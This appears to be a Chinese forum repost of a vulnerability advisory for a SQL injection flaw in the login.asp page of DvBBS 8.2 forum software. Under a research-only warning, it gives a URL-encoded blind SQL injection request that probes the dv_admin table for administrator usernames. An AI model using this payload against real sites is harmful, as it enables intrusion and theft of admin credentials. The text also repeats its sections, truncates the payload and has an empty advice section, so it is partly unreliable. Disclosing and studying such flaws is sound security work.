找了好几个地方终于弄到那个补丁程序。
动网论坛DvBBS login.asp脚本多个SQL注入漏洞
受影响版本: Dvbbs 8.2
描述:
DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序。
DvBBS的login.asp页面没有正确地验证用户所提交的登录请求,远程攻击者可以通过提交恶意的登录请求执行SQL注入攻击,判断有效的用户名和密码HASH。
<* 参考:
hackerb ([email]hackerb@hotmail.com[/email])
受影响版本: Dvbbs 8.2
描述:
DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序。
DvBBS的login.asp页面没有正确地验证用户所提交的登录请求,远程攻击者可以通过提交恶意的登录请求执行SQL注入攻击,判断有效的用户名和密码HASH。
<* 参考:
hackerb ([email]hackerb@hotmail.com[/email])
测试方法:
[警 告]
[警 告]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
[url]http:///www.example.com/?password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528[/url]*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25
建议:
动网论坛
[url]http:///www.example.com/?password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528[/url]*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25
建议:
动网论坛
